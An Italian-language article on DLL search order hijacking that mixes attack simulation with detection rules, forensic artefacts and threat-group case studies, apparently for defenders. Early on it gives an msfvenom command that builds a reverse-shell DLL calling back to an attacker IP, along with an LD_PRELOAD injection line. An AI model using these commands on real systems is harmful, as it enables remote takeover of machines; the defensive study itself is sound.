Hijack delle DLL: DLL Search Order Hijacking (T1574.001)

Il DLL side-loading inizia identificando applicazioni legittime con debolezze nel caricamento delle librerie. Un classico target è qualsiasi eseguibile firmato digitalmente che cerca DLL in directory scrivibili prima di quelle di sistema.

Per simulare un attacco di search order hijacking su Windows, crea prima una DLL malevola che esporta le stesse funzioni dell'originale:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll > malicious.dll

Posiziona la DLL malevola nella stessa directory dell'eseguibile target. Quando l'applicazione viene lanciata, Windows caricherà prima la DLL locale invece di quella legittima in System32. Gruppi come APT3 hanno utilizzato versioni modificate di Chrome per caricare le loro backdoor attraverso questo metodo.

Per il phantom DLL hijacking, identifica riferimenti a DLL non esistenti usando Process Monitor con filtro su NAME NOT FOUND. Lazarus Group ha sostituito win_fw.dll durante l'installazione di IDA Pro, sapendo che il programma cercava questa DLL inesistente.

Su Linux, l'equivalente è l'abuso di LD_PRELOAD:

export LD_PRELOAD=/tmp/malicious.so ./legitimate_app

La tecnica del "loader-for-a-loader" usata da APT41 prevede una catena di DLL dove la prima carica semplicemente la seconda contenente il payload reale. Questo frammenta l'analisi richiedendo la raccolta di tutti i componenti per comprendere il comportamento completo del malware.

Il rilevamento efficace richiede correlazione tra eventi di file system e caricamento moduli. Monitora con Sysmon EventID 7 (Image/DLL Loaded) per catturare tutti i caricamenti di DLL, prestando attenzione a librerie caricate da percorsi non standard.

Crea una baseline dei percorsi normali di caricamento DLL per processo. Qualsiasi deviazione, come explorer.exe che carica DLL da %TEMP%, dovrebbe generare un alert ad alta priorità. InvisiMole sfrutta proprio questo meccanismo posizionando la sua DLL wrapper nella directory di explorer.exe.

Implementa detection rules che correlano:

• Creazione di file DLL in directory di applicazioni legittime (EventID 11)
• Modifiche al registro per DLL redirection (EventID 13)
• Caricamento successivo della DLL creata (EventID 7)

Il timeframe di correlazione dovrebbe essere di 5-10 minuti per catturare l'intera sequenza. FoggyWeb utilizza questa tecnica sostituendo version.dll per Microsoft.IdentityServer.ServiceHost.exe, generando tutti e tre gli eventi in rapida successione.

Per ridurre i falsi positivi, mantieni una whitelist di applicazioni note per caricare DLL da percorsi non standard come ambienti di sviluppo. Strumenti come Visual Studio caricano legittimamente DLL da directory di progetto durante il debugging.

L'analisi forense del DLL hijacking richiede l'esame di artefatti multipli per ricostruire la sequenza di compromissione. Inizia verificando le date di creazione e modifica delle DLL nelle directory delle applicazioni, confrontandole con le versioni legittime.

Il registro di Windows contiene tracce critiche. Esamina HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs per verifiche di integrità e cerca chiavi di redirection sotto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options.

Prefetch files (.pf) rivelano quali DLL sono state caricate da un eseguibile. Confronta i percorsi con esecuzioni precedenti per identificare anomalie. Chimera ha utilizzato side-loading persistente che appare chiaramente nei prefetch come caricamenti da directory non standard.

Gli Event Logs di Windows registrano errori di caricamento DLL che possono indicare tentativi di phantom hijacking. Cerca eventi 1001 nel log Application per "Cannot find DLL" seguiti da creazioni di file in quelle posizioni.

Per ricostruire la timeline completa dell'operazione CuckooBees, correla:

• Timestamp di modifica dei servizi IKEEXT e PrintNotify
• Creazione delle DLL malevole nelle directory di sistema
• Prima esecuzione registrata nei log di servizio
• Comunicazioni di rete successive al caricamento

Memory forensics con Volatility può rivelare DLL caricate in processi legittimi. Il comando dlllist mostra tutti i moduli caricati con percorsi completi, evidenziando immediatamente librerie fuori posto.

Mustang Panda (G0129) rappresenta il caso studio perfetto per l'evoluzione del DLL hijacking. Dal 2019 hanno raffinato la tecnica passando da semplice side-loading a catene complesse di loader multipli. La campagna RedDelta Modified PlugX mostra l'uso sistematico di applicazioni vulnerabili per caricare PlugX attraverso DLL legittime firmate digitalmente.

APT41 dimostra la versatilità geografica della tecnica. Durante APT41 DUST hanno colpito simultaneamente Europa, Asia e Medio Oriente usando DUSTTRAP attraverso l'uninstaller di AhnLab. La scelta di software regionali specifici indica profilazione accurata dei target prima dell'attacco.

I pattern di BackdoorDiplomacy rivelano preferenza per DLL search order hijacking classico piuttosto che side-loading. Questo suggerisce focus su persistenza a lungo termine in ambienti dove le applicazioni non vengono aggiornate frequentemente, tipico di ambasciate e ministeri loro target tradizionali.

Earth Lusca mostra innovazione tattica posizionando oci.dll in %WINDIR%\SYSTEM32 per side-loading attraverso il servizio MSDTC. La scelta di servizi Windows critici indica volontà di mantenere persistenza anche dopo reimaging parziali del sistema.

L'overlap di tool tra gruppi è significativo: PlugX viene utilizzato da almeno 5 gruppi diversi (APT3, Mustang Panda, Naikon, Threat Group-3390, Daggerfly) indicando condivisione di risorse o fornitori comuni nel cybercrime-as-a-service ecosystem cinese.

Framework MITRE ATT&CK documenta dettagliatamente la tecnica T1574.001 con esempi da APT3, APT41, Lazarus Group e Mustang Panda. Le campagne Operation CuckooBees e 3CX Supply Chain Attack forniscono case study recenti di impatto enterprise. Tool di detection includono Sysmon per Event ID 7 e PowerSploit PowerUp per vulnerability assessment.